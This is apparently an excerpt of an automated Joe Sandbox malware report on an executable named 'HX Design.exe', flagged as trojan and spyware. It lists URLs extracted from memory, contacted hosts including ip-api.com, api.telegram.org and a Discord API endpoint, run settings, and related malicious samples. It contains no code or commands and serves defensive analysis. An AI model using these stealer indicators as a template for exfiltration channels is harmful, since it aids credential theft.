http://anglebug.com/5281	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.comC:	chrome.exe, 0000003A.00000002.1917350022.000001C518090000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1917774956.00000143C5200000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	false	high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/255411748	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7246	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7369	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7489	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://wwww.certigna.fr/autorites/0m	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/python/cpython/issues/86361.	HX Design.exe, 00000001.00000003.1702384127.00000294B4AB2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1702130112.00000294B4695000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	false	high
https://httpbin.org/	HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.ver)	svchost.exe, 0000003C.00000002.2922318040.00000298F7800000.00000004.00000020.00020000.00000000.sdmp	false	high
https://anglebug.com/7319v	msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	false	high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	false	high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/161903006	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	HX Design.exe, 00000001.00000003.1706757467.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099002748.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	false	high
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/3078	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7553	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5375	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.securetrust.com/STCA.crl	HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/5371	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/4722	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5421O	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	false	high
https://www.google.com/v	msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.quovadisglobal.com/cpsr	HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/7556	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.cert.fnmt.es/dpcs/	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	false	high
https://google.com/mail	HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.accv.es00	HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	HX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/7406/	chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmp	false	high
https://mahler:8092/site-updates.py	HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.comx	msedge.exe, 0000003B.00000002.1923306413.00006FA400298000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/2162v	msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/6692	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/258207403	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/3502	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3623	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/3625	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3624	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5007	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discordapp.com/api/v9/users/	HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	false	high
http://anglebug.com/3862	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3862r	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.firmaprofesional.com/cps0	HX Design.exe, 00000001.00000002.2099002748.00000294B4650000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/4836	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.accv.esi	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/issues/166475273	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/urllib3/urllib3/issues/2920	HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	false	high
http://crl.securetrust.com/SGCA.crl0	HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	false	high
https://anglebug.com/7161/	chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/5281z	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/4384	msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.thawte.com/ThawteTimestampingCA.crl0	HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.quovadisglobal.com/cps0	HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579227
Start date and time:	2024-12-21 05:56:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	93
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HX Design.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winEXE@153/109@5/4
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 142.250.181.99, 184.30.17.174, 172.202.163.200, 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, gstatic.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 2816 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:57:06	API Interceptor	7x Sleep call for process: WMIC.exe modified
23:57:09	API Interceptor	83x Sleep call for process: powershell.exe modified
23:57:20	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	KJhsNv2RcI.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	gs7lQa4EuM.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	doc00290320092.jse	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	DHL_231437894819.bat.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	KJhsNv2RcI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	gs7lQa4EuM.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	doc00290320092.jse	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL_231437894819.bat.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
bg.microsoft.map.fastly.net	1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	199.232.210.172
	1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	199.232.214.172
	Statements.pdf	Get hash	malicious	WinSearchAbuse	Browse	199.232.210.172
	INVOICE_2279_from_RealEyes Digital LLC (1).pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	Z8oTIWCyDE.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	BB4S2ErvqK.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	MS100384UTC.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	SWIFT.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	tmp.zip	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	199.232.210.172
